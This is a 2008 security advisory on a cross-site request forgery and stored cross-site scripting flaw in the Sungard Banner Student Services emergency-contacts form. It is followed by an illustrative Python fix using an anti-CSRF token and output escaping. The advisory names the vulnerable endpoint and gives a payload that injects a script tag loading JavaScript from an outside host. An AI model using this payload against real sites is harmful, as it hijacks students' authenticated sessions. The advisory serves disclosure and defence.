
| Subject: | CSRF/XSS in Sungard Banner |
|---|---|
| Date: | Tue, 29 Jan 2008 08:43:59 -0800 (PST) |
http://ch4n.org/banner.txt

Application: Banner -- Student Services
Version: 7.3
Bug: Cross-site Request Forgery, cross site scripting
Exploitation: Remote, versus authenticated users
Discovery Date: August 21, 2007
Notification Date: August 22, 2007
Disclosure Date: January 29, 2008
Author: Brendan M. Hickey
Website: http://www.bhickey.net http://www.ch4n.org

INTRODUCTION

"Banner is the world's most widely used collegiate administrative suite of student, financial aid, finance, human resources, and advancement systems." -- Sungard.com

"Banner Student fuses administrative and academic functions that make it easy to manage data while giving prospects, learners (both traditional and non-traditional), and faculty secure, 24x7, online access to the information they need. Prospects can apply for admissions. Learners can search and register for classes by term or date, and retrieve financial aid data. Faculty can easily manage course information, rosters, and grading, and advise students." -- Banner Student product information (http://www.sungardhe.com/Products/Product.aspx?id=1024)

University students interact with 'Banner Student Services' through a web interface. Tasks are performed by making POST requests to fixed URLs. A cross-site scripting attack facilitated by cross-site request forgery was discovered in the "Emergency Contacts" section of the service.

BUG

A student may update her emergency contacts through a web form. Each form field is checked for length, the longest accepting 30 characters, but not content. An attacker can inject arbitrary javascript code into a user's session by luring authenticated Banner users to a website that makes a POST request to the update contacts script.

The script necessary to update the emergency contacts is located at:

http://BANNERDOMAIN/ss/bwgkoemr.P_UpdateEmrgContacts

Setting the address field (add1) to <script src=http://ch4n.org/s> is necessary to include malicious javascript. Other form variables must be set; this can be seen in the example code.

EXAMPLE CODE

http://ch4n.org/banner_code.txt

VENDOR NOTIFICATION

The vulnerability was disclosed to Sungard on August 22, 2007.

FIX

This vulnerability can be remedied by requiring a magic number to accompany POST requests.
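The fix the advisory proposes (a per-session "magic number", i.e. an anti-CSRF token, on every state-changing POST) together with output encoding of the stored contact fields, as an added illustration that is not part of the advisory and not Banner's code; the session store, handler names and the 30-character limit on `add1` are assumed for the example.

```python
import hmac
import html
import secrets

# Constructed in-memory session store: session id -> {"csrf": token, "contacts": ...}
SESSIONS = {}
MAX_FIELD_LEN = 30  # the length check the advisory describes; content was never checked


def new_session():
    """Create a session and bind a random anti-CSRF token (the 'magic number') to it."""
    sid = secrets.token_hex(16)
    SESSIONS[sid] = {"csrf": secrets.token_hex(16), "contacts": None}
    return sid


def render_form(sid):
    """Server-rendered form: the token is a hidden field a cross-origin page cannot read."""
    token = SESSIONS[sid]["csrf"]
    return ('<form method="POST" action="/ss/bwgkoemr.P_UpdateEmrgContacts">'
            f'<input type="hidden" name="csrf" value="{token}">'
            '<input name="add1" maxlength="30"></form>')


def update_contacts(sid, post):
    """Handle the update POST. A forged cross-site form still carries the victim's
    session cookie (sid), but it cannot supply the session-bound token, so it is refused."""
    session = SESSIONS.get(sid)
    if session is None:
        return 401, "no session"
    supplied = post.get("csrf", "")
    # Constant-time comparison; encode so non-ASCII input cannot raise TypeError.
    if not hmac.compare_digest(supplied.encode(), session["csrf"].encode()):
        return 403, "missing or invalid CSRF token"
    add1 = post.get("add1", "")
    if len(add1) > MAX_FIELD_LEN:
        return 400, "field too long"
    # Store the raw value; it is encoded on output so markup is displayed, not executed.
    session["contacts"] = {"add1": add1}
    return 200, "updated"


def render_contacts(sid):
    """Display stored contacts with HTML entity encoding, closing the XSS half of the bug."""
    contacts = SESSIONS[sid]["contacts"] or {"add1": ""}
    return f'<td>{html.escape(contacts["add1"], quote=True)}</td>'
```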